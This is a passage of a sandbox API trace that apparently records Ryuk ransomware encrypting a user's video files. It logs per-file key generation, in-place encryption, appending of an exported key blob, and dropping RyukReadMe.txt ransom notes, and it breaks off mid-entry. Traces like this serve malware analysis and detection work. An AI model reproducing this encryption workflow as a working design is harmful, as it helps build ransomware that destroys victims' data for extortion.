[0159.126] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.126] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.126] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.126] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.126] CloseHandle (hObject=0xd4) returned 1 [0159.143] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.147] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.147] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.147] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.148] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.148] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\W0qVcnhN.flv", dwFileAttributes=0x80) returned 1 [0159.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\W0qVcnhN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\w0qvcnhn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.148] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=56559) returned 1 [0159.148] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=56559) returned 1 [0159.148] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xdbcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.148] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.149] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.149] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.149] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.149] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.149] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdcef, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xdcef, lpOverlapped=0x0) returned 1 [0159.150] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.150] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xdcef, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xdcf0) returned 1 [0159.150] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.150] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdcf0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xdcf0, lpOverlapped=0x0) returned 1 [0159.151] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.151] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.151] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.151] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.151] CloseHandle (hObject=0xd4) returned 1 [0159.176] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.180] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.180] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.181] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.181] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.181] SetLastError (dwErrCode=0x0) [0159.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.181] GetLastError () returned 0x0 [0159.181] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0159.182] CloseHandle (hObject=0xe4) returned 1 [0159.182] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.182] SetLastError (dwErrCode=0x0) [0159.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.182] GetLastError () returned 0xb7 [0159.182] CloseHandle (hObject=0xe4) returned 1 [0159.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\QkX9P0K5CiPE4\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.182] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.182] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.182] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.183] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\QkX9P0K5CiPE4\\CknB03ORbiWemT.avi", dwFileAttributes=0x80) returned 1 [0159.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\QkX9P0K5CiPE4\\CknB03ORbiWemT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\qkx9p0k5cipe4\\cknb03orbiwemt.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.183] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=44212) returned 1 [0159.183] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=44212) returned 1 [0159.183] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xab92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.183] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.184] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.184] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.184] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.184] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.184] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xacb4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xacb4, lpOverlapped=0x0) returned 1 [0159.185] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.185] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xacb4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xacc0) returned 1 [0159.185] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.185] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xacc0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xacc0, lpOverlapped=0x0) returned 1 [0159.185] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.185] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.185] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.185] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.185] CloseHandle (hObject=0xd4) returned 1 [0159.201] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.206] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.206] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.206] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.206] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.206] SetLastError (dwErrCode=0x0) [0159.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\QkX9P0K5CiPE4\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\qkx9p0k5cipe4\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.207] GetLastError () returned 0x0 [0159.207] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0159.207] CloseHandle (hObject=0xe4) returned 1 [0159.208] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.208] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\vj_OeQWQ.mkv", dwFileAttributes=0x80) returned 1 [0159.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\vj_OeQWQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\vj_oeqwq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.208] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=30759) returned 1 [0159.208] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=30759) returned 1 [0159.208] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0x7705, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.208] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0159.209] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.209] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0159.209] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.209] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.209] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7827, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x7827, lpOverlapped=0x0) returned 1 [0159.210] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0159.210] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x7827, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x7830) returned 1 [0159.210] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.210] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7830, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x7830, lpOverlapped=0x0) returned 1 [0159.210] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0159.210] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0159.210] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0159.210] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0159.210] CloseHandle (hObject=0xe4) returned 1 [0159.225] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.229] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.229] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.229] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.229] SetLastError (dwErrCode=0x0) [0159.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.230] GetLastError () returned 0xb7 [0159.230] CloseHandle (hObject=0xe4) returned 1 [0159.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.230] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.230] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.230] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.230] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\3SbN5REJ6 Jr8ZiC0TT.mp4", dwFileAttributes=0x80) returned 1 [0159.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\3SbN5REJ6 Jr8ZiC0TT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\wj4qlm\\3sbn5rej6 jr8zic0tt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.231] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=71984) returned 1 [0159.231] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=71984) returned 1 [0159.231] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x1180e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.231] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.231] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.231] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.231] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.231] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.232] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11930, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x11930, lpOverlapped=0x0) returned 1 [0159.233] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.233] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x11930, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x11940) returned 1 [0159.233] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.233] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11940, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x11940, lpOverlapped=0x0) returned 1 [0159.233] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.233] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.233] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.233] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.234] CloseHandle (hObject=0xd4) returned 1 [0159.248] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.252] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.252] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.252] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.253] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\Nuq_Y9scWVmD.mkv", dwFileAttributes=0x80) returned 1 [0159.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\Nuq_Y9scWVmD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\wj4qlm\\nuq_y9scwvmd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.253] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=10444) returned 1 [0159.253] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=10444) returned 1 [0159.253] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x27aa, 